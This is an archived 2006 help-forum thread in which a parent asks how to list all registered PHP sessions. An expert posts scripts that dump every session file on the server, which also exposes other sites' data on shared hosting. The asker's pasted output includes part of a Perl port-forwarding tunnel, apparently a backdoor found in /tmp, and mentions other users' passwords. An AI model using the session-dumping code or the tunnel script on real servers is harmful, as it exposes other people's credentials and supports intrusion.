Creating a list of all registered sessions

Posted on 2006-05-10
Last Modified: 2008-03-10
Last night my 11 years old son asked me if it's possible to create
a list of all registered sessions while I was reading a PHP
tutorial. I tried a "For each" loop, but had to give up
after receiving some errors.

I appreciate if somebody can show him (if possible) how to
create a list of all registered session.
Question by:MnInShdw
    LVL 16

    Accepted Solution

    try this

    foreach ($_SESSION as $x)
    echo $x;
    LVL 40

    Expert Comment

    Dr_dedo, not just the variables for the current session, but all sessions.


    PHP 5 code (required because I am using the SPL DirectoryIterator class).

    foreach(new DirectoryIterator(session_save_path()) as $obj_Session)
          if ($obj_Session->isFile())
                $s_session_data = file_get_contents($obj_Session->getPathname());
                echo '<b>' . $obj_Session->getPathname() . '</b><br /><pre>' . var_export($s_session_data, True) . '</pre><br /><br />';

    Works for me!
    LVL 40

    Expert Comment

    You will probably have problems if the sessions are locked against a site (in a multiple hosted server), so only sessions on your own site.

    I've just ran this on a friends server and the number of perl backdoor scripts present was frightening!
    LVL 16

    Expert Comment

    wow, niceeeeeeeeeee
    LVL 40

    Expert Comment

    If you site is using the /tmp directory for the session files, then you will get a LOT of junk here too. So watch out when you run that script.
    LVL 1

    Author Comment

    thanks dr_dedo  for your help.
    I had forgotten to start the session in my script
    and that was why it didn't work out.

    And million thanks to RQuadling for trying to help
    but unfotunately ixwebhosting is still on php4 and
    I received "Unknown function" when I tried to
    test the sample code.

    One more time thanks to all who helped.
    LVL 40

    Expert Comment

    The answer provided by dr_dedo has nothing to do with listing all the registered sessions!!!

    It only allows you to look at your OWN current session.

    And if you said you where on PHP4, I'd have given an appropriate answer.

    You also did not say what your errors were.

    This is an equivalent PHP4 script.

    $obj_Dir = dir(session_save_path());
    while(False !== ($s_file = $obj_Dir->read()))
          echo $s_file;
          if (!in_array($s_file, array('.', '..')))
                $s_session_data = file_get_contents(session_save_path() . "/$s_file");
                echo '<b>' . $s_file . '</b><br /><pre>' . var_export($s_session_data, True) . '</pre><br /><br />';

    This will also work with PHP5, but the process is a lot easier in PHP5 with the SPL.

    LVL 17

    Expert Comment

    Tell you 11 year old to keep into programming, its a lot of fun =)
    LVL 1

    Author Comment

    Hi RQuadling

    First of all my appologies for not mentioning the errors contents.

    I did a copy and paste of your code and heaven.... I had a lot of things
    in the result. the page contents was over several thousands lines
    A lot of subs - functions - even other homepages were inserted in the result
    but nothing about the session variables.
    the frist line starts with several errors:
    Warning: file_get_contents(/tmp/lost+found): failed to open stream: Permission denied in /hsphere/local/home/mydomain/ on line 8

    I have even a lot of subs and functions
    use IO::Socket;
    use POSIX;
    $localport = $ARGV[0];
    $host      = $ARGV[1];
    $port      = $ARGV[2];
    $DIR = undef;
    $| = 1;
    if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
    %o = (\'port\' => $localport,\'toport\' => $port,\'tohost\' => $host);
    $ah = IO::Socket::INET->new(\'LocalPort\' => $localport,\'Reuse\' => 1,\'Listen\' => 10) || die "$!";
    $SIG{\'CHLD\'} = \'IGNORE\';
    $num = 0;
    while (1) {
    $ch = $ah->accept(); if (!$ch) { print STDERR "$!\\n"; next; }
    $pid = fork();
    if (!defined($pid)) { print STDERR "$!\\n"; }
    elsif ($pid == 0) { $ah->close(); Run(\\%o, $ch, $num); }
    else { $ch->close(); }
    sub Run {
    my($o, $ch, $num) = @_;
    my $th = IO::Socket::INET->new(\'PeerAddr\' => $o->{\'tohost\'},\'PeerPort\' => $o->{\'toport\'});
    if (!$th) { exit 0; }
    my $fh;
    if ($o->{\'dir\'}) { $fh = Symbol::gensym(); open($fh, ">$o->{\'dir\'}/tunnel$num.log") or die "$!"; }
    while ($ch || $th) {
    my $rin = "";
    vec($rin, fileno($ch), 1) = 1 if $ch;
    vec($rin, fileno($th), 1) = 1 if $th;
    my($rout, $eout);
    select($rout = $rin, undef, $eout = $rin, 120);
    if (!$rout  &&  !$eout) {}
    my $cbuffer = "";
    my $tbuffer = "";
    if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
    my $result = sysread($ch, $tbuffer, 1024);
    if (!defined($result)) {
    print STDERR "$!\\n";
    exit 0;

    and there's a lot of passwords and database informations (obviously not mine)
    the page never ends and the contents are adding, I had to hit stop and then Ctrl+Break.
    I have even more than 20 other home pages embedded in the result.
    this is one of them and is in the middle of the result

    None of my registered session was in the result.
    To me it doesn't appear to be the correct method of gathering the
    registered session.

    I appreciate your trying to help.
    Million thanks
    LVL 1

    Author Comment

    Hi BogoJoker
    I told my son about your message, but his dad has a hard
    time learning PHP at the age of 43.

    Thank you for your input
    LVL 40

    Expert Comment

    The session directory is quite often the /tmp folder on the server.

    What you are seeing is ALL the content of the temp folder.

    On my servers the session folder is NOT tmp. So I only see other people's sessions.


    Featured Post

    Better Security Awareness With Threat Intelligence

    See how one of the leading financial services organizations uses Recorded Future as part of a holistic threat intelligence program to promote security awareness and proactively and efficiently identify threats.

    Join & Write a Comment

    Consider the following scenario: You are working on a website and make something great - something that lets the server work with information submitted by your users. This could be anything, from a simple guestbook to a e-Money solution. But what…
    These days socially coordinated efforts have turned into a critical requirement for enterprises.
    The viewer will learn how to create and use a small PHP class to apply a watermark to an image. This video shows the viewer the setup for the PHP watermark as well as important coding language. Continue to Part 2 to learn the core code used in creat…
    The viewer will learn how to create a basic form using some HTML5 and PHP for later processing. Set up your basic HTML file. Open your form tag and set the method and action attributes.: (CODE) Set up your first few inputs one for the name and …

    728 members asked questions and received personalized solutions in the past 7 days.

    Join the community of 500,000 technology professionals and ask your questions.

    Join & Ask a Question

    Need Help in Real-Time?

    Connect with top rated Experts

    24 Experts available now in Live!

    Get 1:1 Help Now